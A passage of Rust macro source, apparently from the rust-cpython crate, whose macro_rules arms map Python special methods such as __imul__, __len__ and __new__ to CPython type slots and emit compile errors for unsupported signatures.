nb_inplace_multiply: $crate::py_class_binary_slot!($class::__imul__, [&$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __imul__(&$slf,) $res_type; { $($body)* } [{ $other : &$other_name = {} }] }
}
$members $props
}};
{ { def __imul__(&$slf:ident, $other:ident : $other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_multiply: $crate::py_class_binary_slot!($class::__imul__, [$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __imul__(&$slf,) $res_type; { $($body)* } [{ $other : $other_name = {} }] }
}
$members $props
}};
{ { def __imul__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __imul__" }
};
{ { def __index__(&$slf:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_index: $crate::py_class_unary_slot!($class::__index__, *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __index__(&$slf,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { def __index__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __index__" }
};
{ { def __init__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__init__ is not supported by py_class!; use __new__ instead." }
};
{ { def __instancecheck__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__instancecheck__ is not supported by py_class! yet." }
};
{ { def __int__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__int__ is not supported by py_class! yet." }
};
{ { def __invert__(&$slf:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_invert: $crate::py_class_unary_slot!($class::__invert__, *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __invert__(&$slf,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { def __invert__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __invert__" }
};
{ { def __ior__(&$slf:ident, $other:ident : Option<&$other_name:ty>) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_or: $crate::py_class_binary_slot!($class::__ior__, [Option<&$other_name>], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __ior__(&$slf,) $res_type; { $($body)* } [{ $other : Option<&$other_name> = {} }] }
}
$members $props
}};
{ { def __ior__(&$slf:ident, $other:ident : &$other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_or: $crate::py_class_binary_slot!($class::__ior__, [&$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __ior__(&$slf,) $res_type; { $($body)* } [{ $other : &$other_name = {} }] }
}
$members $props
}};
{ { def __ior__(&$slf:ident, $other:ident : $other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_or: $crate::py_class_binary_slot!($class::__ior__, [$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __ior__(&$slf,) $res_type; { $($body)* } [{ $other : $other_name = {} }] }
}
$members $props
}};
{ { def __ior__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __ior__" }
};
{ { def __ipow__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__ipow__ is not supported by py_class! yet." }
};
{ { def __irshift__(&$slf:ident, $other:ident : Option<&$other_name:ty>) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_rshift: $crate::py_class_binary_slot!($class::__irshift__, [Option<&$other_name>], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __irshift__(&$slf,) $res_type; { $($body)* } [{ $other : Option<&$other_name> = {} }] }
}
$members $props
}};
{ { def __irshift__(&$slf:ident, $other:ident : &$other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_rshift: $crate::py_class_binary_slot!($class::__irshift__, [&$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __irshift__(&$slf,) $res_type; { $($body)* } [{ $other : &$other_name = {} }] }
}
$members $props
}};
{ { def __irshift__(&$slf:ident, $other:ident : $other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_rshift: $crate::py_class_binary_slot!($class::__irshift__, [$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __irshift__(&$slf,) $res_type; { $($body)* } [{ $other : $other_name = {} }] }
}
$members $props
}};
{ { def __irshift__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __irshift__" }
};
{ { def __isub__(&$slf:ident, $other:ident : Option<&$other_name:ty>) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_subtract: $crate::py_class_binary_slot!($class::__isub__, [Option<&$other_name>], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __isub__(&$slf,) $res_type; { $($body)* } [{ $other : Option<&$other_name> = {} }] }
}
$members $props
}};
{ { def __isub__(&$slf:ident, $other:ident : &$other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_subtract: $crate::py_class_binary_slot!($class::__isub__, [&$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __isub__(&$slf,) $res_type; { $($body)* } [{ $other : &$other_name = {} }] }
}
$members $props
}};
{ { def __isub__(&$slf:ident, $other:ident : $other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_subtract: $crate::py_class_binary_slot!($class::__isub__, [$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __isub__(&$slf,) $res_type; { $($body)* } [{ $other : $other_name = {} }] }
}
$members $props
}};
{ { def __isub__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __isub__" }
};
{ { def __iter__(&$slf:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_iter: $crate::py_class_unary_slot!($class::__iter__, *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __iter__(&$slf,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { def __iter__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __iter__" }
};
{ { def __itruediv__(&$slf:ident, $other:ident : Option<&$other_name:ty>) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_true_divide: $crate::py_class_binary_slot!($class::__itruediv__, [Option<&$other_name>], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __itruediv__(&$slf,) $res_type; { $($body)* } [{ $other : Option<&$other_name> = {} }] }
}
$members $props
}};
{ { def __itruediv__(&$slf:ident, $other:ident : &$other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_true_divide: $crate::py_class_binary_slot!($class::__itruediv__, [&$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __itruediv__(&$slf,) $res_type; { $($body)* } [{ $other : &$other_name = {} }] }
}
$members $props
}};
{ { def __itruediv__(&$slf:ident, $other:ident : $other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_true_divide: $crate::py_class_binary_slot!($class::__itruediv__, [$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __itruediv__(&$slf,) $res_type; { $($body)* } [{ $other : $other_name = {} }] }
}
$members $props
}};
{ { def __itruediv__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __itruediv__" }
};
{ { def __ixor__(&$slf:ident, $other:ident : Option<&$other_name:ty>) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_xor: $crate::py_class_binary_slot!($class::__ixor__, [Option<&$other_name>], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __ixor__(&$slf,) $res_type; { $($body)* } [{ $other : Option<&$other_name> = {} }] }
}
$members $props
}};
{ { def __ixor__(&$slf:ident, $other:ident : &$other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_xor: $crate::py_class_binary_slot!($class::__ixor__, [&$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __ixor__(&$slf,) $res_type; { $($body)* } [{ $other : &$other_name = {} }] }
}
$members $props
}};
{ { def __ixor__(&$slf:ident, $other:ident : $other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_xor: $crate::py_class_binary_slot!($class::__ixor__, [$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __ixor__(&$slf,) $res_type; { $($body)* } [{ $other : $other_name = {} }] }
}
$members $props
}};
{ { def __ixor__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __ixor__" }
};
{ { def __le__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__le__ is not supported by py_class! use __richcmp__ instead." }
};
{ { def __len__(&$slf:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt $as_number:tt
/* as_sequence */ [ $( $sq_slot_name:ident : $sq_slot_value:expr, )* ]
/* as_mapping */ [ $( $mp_slot_name:ident : $mp_slot_value:expr, )* ]
$setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots $as_number
/* as_sequence */ [
$( $sq_slot_name : $sq_slot_value, )*
sq_length: $crate::py_class_unary_slot!($class::__len__, $crate::_detail::ffi::Py_ssize_t, $crate::py_class::slots::LenResultConverter),
]
/* as_mapping */ [
$( $mp_slot_name : $mp_slot_value, )*
mp_length: Some($crate::_detail::ffi::PySequence_Size),
]
$setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __len__(&$slf,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { def __len__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __len__" }
};
{ { def __long__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__long__ is not supported by py_class! yet." }
};
{ { def __lshift__($left:ident, $right:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_lshift: $crate::py_class_numeric_slot!(binary $class::__lshift__),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __lshift__() $res_type; { $($body)* } [ { $left : &$crate::PyObject = {} } { $right : &$crate::PyObject = {} } ] }
}
$members $props
}};
{ { def __lshift__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for binary numeric operator __lshift__" }
};
{ { def __lt__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__lt__ is not supported by py_class! use __richcmp__ instead." }
};
{ { def __matmul__($left:ident, $right:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_matrix_multiply: $crate::py_class_numeric_slot!(binary $class::__matmul__),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __matmul__() $res_type; { $($body)* } [ { $left : &$crate::PyObject = {} } { $right : &$crate::PyObject = {} } ] }
}
$members $props
}};
{ { def __matmul__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for binary numeric operator __matmul__" }
};
{ { def __mod__($left:ident, $right:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_remainder: $crate::py_class_numeric_slot!(binary $class::__mod__),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __mod__() $res_type; { $($body)* } [ { $left : &$crate::PyObject = {} } { $right : &$crate::PyObject = {} } ] }
}
$members $props
}};
{ { def __mod__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for binary numeric operator __mod__" }
};
{ { def __mul__($left:ident, $right:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_multiply: $crate::py_class_numeric_slot!(binary $class::__mul__),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __mul__() $res_type; { $($body)* } [ { $left : &$crate::PyObject = {} } { $right : &$crate::PyObject = {} } ] }
}
$members $props
}};
{ { def __mul__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for binary numeric operator __mul__" }
};
{ { def __ne__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__ne__ is not supported by py_class! use __richcmp__ instead." }
};
{ { def __neg__(&$slf:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_negative: $crate::py_class_unary_slot!($class::__neg__, *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __neg__(&$slf,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { def __neg__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __neg__" }
};
{ { def __new__ ($cls:ident) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_new: $crate::py_class_wrap_newfunc!{$class::__new__ []},
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __new__($cls: &$crate::PyType,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { $visibility:vis def __new__ ($cls:ident) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_new: $crate::py_class_wrap_newfunc!{$class::__new__ []},
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, $visibility, __new__($cls: &$crate::PyType,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { def __new__ ($cls:ident, $($p:tt)+) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_new: $crate::py_argparse_parse_plist_impl!{py_class_wrap_newfunc {$class::__new__} [] ($($p)+,)},
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_argparse_parse_plist_impl!{
py_class_impl_item { $class, $py, pub, __new__($cls: &$crate::PyType,) $res_type; { $($body)* } }
[] ($($p)+,)
}
}
$members $props
}};
{ { $visibility:vis def __new__ ($cls:ident, $($p:tt)+) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_new: $crate::py_argparse_parse_plist_impl!{py_class_wrap_newfunc {$class::__new__} [] ($($p)+,)},
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_argparse_parse_plist_impl!{
py_class_impl_item { $class, $py, $visibility, __new__($cls: &$crate::PyType,) $res_type; { $($body)* } }
[] ($($p)+,)
}
}
$members $props
}};
{ { def __next__(&$slf:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
